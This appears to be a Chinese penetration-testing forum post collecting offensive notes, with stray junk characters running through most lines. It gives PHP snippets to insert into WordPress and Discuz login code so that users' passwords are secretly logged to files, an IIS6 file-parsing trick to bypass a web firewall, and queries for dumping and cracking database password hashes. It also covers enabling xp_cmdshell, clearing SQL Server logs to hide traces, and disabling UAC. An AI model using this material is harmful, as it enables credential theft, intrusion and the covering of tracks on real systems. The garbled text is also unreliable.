- r* ?; B; F% r; r. x: _$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;2 z: ^' p2 I3 o2 e2 ?
$txt=$txt.”\r\n”;
8 I7 A9 S  q) c& _) G, i  Rif($log_user&&$log_pwd&&$log_ip){% j" i: k& R3 q& [# A
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
. x6 C: ^0 F5 I0 ]* C1 n  a+ \: {}
# |" C, ?! j( u: M; u. m' R! w* n9 W当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
. |0 Y$ }, ^! P0 q  Y- V; _7 b$ c1 u就是搜索case ‘login’9 S3 A- R0 G! H
在它下面直接插入即可,记录的密码生成在pwd.txt中,
/ H% b4 M9 V- g  _其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录8 a; y& l% n9 E. L4 P! m" X
利用II6文件解析漏洞绕过安全狗代码:+ }3 L* I* g, A# x
;antian365.asp;antian365.jpg
) e: ]1 O2 X4 |: O' l7 j8 B  {8 a% T; E/ i
各种类型数据库抓HASH破解最高权限密码!
. `! @  H# l" _& \9 T) `1.sql server2000
7 K7 q+ _# p: D) G7 I/ gSELECT password from master.dbo.sysxlogins where name='sa'
  n; G% c6 T5 Q" i* y0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
9 d- F. w) a# b/ F' L. m& B. z- p2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
1 S+ ?+ J  w9 R3 ~
; F) l6 J1 q/ T. o: ~$ q0×0100- constant header) U$ b. r7 s$ P4 s$ i9 v
34767D5C- salt# I1 P' j' u) N" v) f; j7 \
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
/ J, ]4 L& w4 Q2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
. ]/ Y" P0 u0 s/ j  j' w8 mcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
4 h3 o2 Y! F& Z2 N3 a$ E0 fSQL server 2005:-
+ K& y% f0 `& l% Q# @7 `3 Q9 BSELECT password_hash FROM sys.sql_logins where name='sa'
, z5 q! k# i, v0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
- C2 w& ?) ^: p" i4 E( {) s0×0100- constant header4 l; c$ H7 \, D, p5 |8 U
993BF231-salt  C0 F+ `2 C2 T* w# ^& B
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
5 E! P% ^: y! W* Q- e: Fcrack case sensitive hash in cain, try brute force and dictionary based attacks./ w! j& B8 A  j0 E  n

# r2 {3 a2 [( L# hupdate:- following bernardo’s comments:-
) X7 t, o' _% n& [use function fn_varbintohexstr() to cast password in a hex string.
. P, m) N8 G' U' n  U1 Ve.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins6 n" _  n% j7 P7 z0 X: r. L' O# k

: i8 P. ]/ A# R5 ^* u. D- zMYSQL:-
, R( g0 w( E9 v6 I  R
7 v7 L! Q7 T6 h+ {, Y4 N2 R7 V/ d* tIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.0 [% D2 e( l2 l. }

; r: C9 U' Q! j! n3 ?2 g- X: r; [*mysql  < 4.1
7 G' X3 ^1 y; M' B* e3 K9 {5 Q4 h' T
mysql> SELECT PASSWORD(‘mypass’);
8 z, E- H/ O$ k/ y" C5 l& w* H4 w+——————–+
1 S7 \3 Y) W+ e/ ?& l9 f| PASSWORD(‘mypass’) |
9 D) ~9 M, ?5 a. F7 I) L+——————–+$ o# r6 a% K& a& D* I" @+ d
| 6f8c114b58f2ce9e   |
, X" P7 b: u/ H* G; Z+——————–+* x3 c# {2 L" ^( R
0 P2 \1 y, M; V& k" b) _2 x% c" R
*mysql >=4.1* M6 d5 A6 U, r
3 m4 P  J& E3 s! T# r, a0 R+ F
mysql> SELECT PASSWORD(‘mypass’);; V" U" {1 y0 Z' i1 f8 U1 e0 u
+——————————————-+  G$ U+ _5 d2 ]' n. Q: Z$ e, l
| PASSWORD(‘mypass’)                        |
  I2 e4 N& ?8 f. X7 g& u2 e; \+——————————————-+6 [$ u: J/ k/ `" O! |
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |, m1 a* w( q/ p# A, q. B& l
+——————————————-+
: H' _7 ?7 Y" G2 _' B, C
+ T4 U2 x/ j5 z; i8 t* ]; K" jSelect user, password from mysql.user" z2 I5 _) f2 y* o4 l) {% a/ h
The hashes can be cracked in ‘cain and abel’
$ t* y' F7 {5 a! b, g. `8 R% D
& d* A* b. L2 w3 h- }2 XPostgres:-- R8 R6 H" H" @) Z1 _0 ]
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)) _: I0 j* u6 g; ]6 O9 `
select usename, passwd from pg_shadow;
' p- v( m- P/ _( v+ f. T" |: U* Iusename      |  passwd
% v4 i. W) ^4 W. \" b" i——————+————————————-: t" b  T5 ?5 Y; @% R4 u
testuser            | md5fabb6d7172aadfda4753bf0507ed4396/ Y; n% q$ u8 Z. B0 `- b# L, S3 v
use mdcrack to crack these hashes:-* f' p+ ~7 ]3 [' B9 e, a+ K9 w
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396& C% T0 B/ c' n8 O! x* ]# O" j

* }! q6 {/ x& uOracle:-" w& g0 M' c1 ]3 ?; y8 ~
select name, password, spare4 from sys.user$
! e% A* O* {( x$ _# bhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g4 i, M" \' B% f, y3 ?! m
More on Oracle later, i am a bit bored….
/ d( a+ Y0 ^  R! e# \" ^4 {7 D4 l

, S% T- W/ Q2 h' p( M& b在sql server2005/2008中开启xp_cmdshell  z6 Q6 i8 M) i2 C( R
-- To allow advanced options to be changed.8 w& q7 V  P" N4 z0 j4 p
EXEC sp_configure 'show advanced options', 1
' O; u  G9 w; L% ^! V, b# XGO) d+ }- ^/ z2 d5 y8 p0 e
-- To update the currently configured value for advanced options.
6 a6 C6 H: {- j1 BRECONFIGURE
+ @/ a: I) Q3 h' N" k2 W5 t% C: g, Z& ]/ |GO
  z$ h5 {  p' a8 l0 C-- To enable the feature.
0 r9 c  D0 |3 p& V' W% mEXEC sp_configure 'xp_cmdshell', 1
6 S5 \2 x" ^3 cGO% m- m  `2 e2 O2 Z' j
-- To update the currently configured value for this feature.
; j0 ?1 Y) m* ^, B+ Q5 l  `, ORECONFIGURE
( b- Y/ ?( [% K% e2 ?GO
' R* M' z* O- S1 a0 C0 ]SQL 2008 server日志清除,在清楚前一定要备份。
' J5 }0 X- g: F& k( `. V/ @如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
6 j1 J7 C1 H1 v; F0 zX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin+ K0 X  k) o6 `

6 q/ n4 ]8 I/ a2 [1 n0 h对于SQL Server 2008以前的版本:
0 ]; ^& W) q  _' O5 r+ USQL Server 2005:
+ u5 x4 i1 O+ h, R2 T2 ~删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat8 c9 X% f3 x, |" ^
SQL Server 2000:
4 h/ E) V5 _& |清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。3 p1 @5 ]" g7 ?3 Z& f+ ^
! `- e9 r- Z' a
本帖最后由 simeon 于 2013-1-3 09:51 编辑8 ?& f9 U4 P! g8 ]  g" \

% h, V  S+ \7 U' Z) U/ N) u3 z2 d4 ?( W
windows 2008 文件权限修改6 M% u- \+ x! A7 g- X
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx- J8 {8 {( {6 x. P8 p1 U- j0 D! `
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
! k/ C' f& p: Y; P0 Z5 O0 n& F( g一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,4 @5 h# S5 P. B! e$ Z; X  {
: o0 Z  M  W4 N! H
Windows Registry Editor Version 5.00
. @' |/ Z! d% m. V7 B0 y7 f[HKEY_CLASSES_ROOT\*\shell\runas]
; @% q, A: ?8 z* Y( B@="管理员取得所有权"
% q% D& N5 G$ e- m! m$ W. d"NoWorkingDirectory"=""
& l+ m6 l! }7 c2 S" W6 I) `[HKEY_CLASSES_ROOT\*\shell\runas\command]
$ c$ o$ ?9 E0 e, U4 S@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 Q: v% i* H# p"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F": y3 V' M) ?8 T6 Q
[HKEY_CLASSES_ROOT\exefile\shell\runas2]# B( Q: @; P6 H* ?( \" S( d
@="管理员取得所有权"8 x; i5 J- r. a0 [& }9 l
"NoWorkingDirectory"=""% d+ i/ O) |, E3 y* h, V
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
: u, q' x9 ~6 n. ?+ M( t4 ]1 R1 |@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# ^5 n/ a$ L2 i- }"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* W2 ~. y0 R: n' k( H) k2 J* p) b( f- w1 Q
[HKEY_CLASSES_ROOT\Directory\shell\runas]
' P+ B+ ?3 d3 h- Q/ ?@="管理员取得所有权"
( q/ l) A/ P1 W( `: S"NoWorkingDirectory"=""
. s, [9 y+ B2 r0 X& i! v5 y[HKEY_CLASSES_ROOT\Directory\shell\runas\command]: H+ l4 }+ @0 j& o# N+ Z
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"7 y& h* X/ B' l1 ~- P; T* Y' o
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"7 q5 w; w+ J' U0 W( [( B& p5 c. B6 i" ~: `
, H$ v. K, m4 \; d

3 H) ]. A3 n% r* N. Swin7右键“管理员取得所有权”.reg导入7 \, D( b. f" {0 \% N9 K# O
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
$ U9 p6 |& N/ O" y2 g. w1、C:\Windows这个路径的“notepad.exe”不需要替换5 }3 ?+ e3 c& g9 U) k$ h7 {
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换  d  c! Y8 b5 C" M3 S; G+ Y
3、四个“notepad.exe.mui”不要管. C( h6 f; g6 a8 G# }
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和) v/ F8 M, }# k0 Y/ N
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”+ D  R! d. n% D" ^" N; a) k6 h# t/ M
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,, R% y! m; h& ?* F7 s6 g
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。9 l9 u8 _7 @# z1 s' N$ M0 [" E- O
windows 2008中关闭安全策略: + T9 l$ i$ N0 K' |
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
8 m# ?1 T$ r' o: O& X7 x* s; R4 J0 N修改uc_client目录下的client.php 在* [& q" [+ `& _& Q8 B- s
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
6 {' t; R  {# j% m/ n/ r下加入如上代码,在网站./data/cache/目录下自动生成csslog.php" W3 o* Y" P8 N- |9 q  q
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
) \* I1 A/ B* \1 G# O- Iif(getenv('HTTP_CLIENT_IP')) {1 q& t+ X6 p& y; s9 V8 E
$onlineip = getenv('HTTP_CLIENT_IP');8 D5 b* j/ @5 C  B% L* Q
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
% U, B6 Z+ n- Y( ?/ P" p, J  r5 ]$onlineip = getenv('HTTP_X_FORWARDED_FOR');
5 E, N7 K9 j" X7 e0 h" S6 V; q} elseif(getenv('REMOTE_ADDR')) {
+ w0 k2 Q6 ~: G& ?4 Q# Z* O$onlineip = getenv('REMOTE_ADDR');
1 N9 W/ m/ [) z1 @6 z} else {
: }' B- S  e& ]$ N# A$ r$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];7 n: q+ B* c: q- ?1 r
}
& G: q  ^  S# `. F) E  f, C3 V     $showtime=date("Y-m-d H:i:s");9 W! G- x; O3 q5 i! W  r
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
5 {( c2 `* r1 v: t- K    $handle=fopen('./data/cache/csslog.php','a+');
7 f1 f; s" g) U- x    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2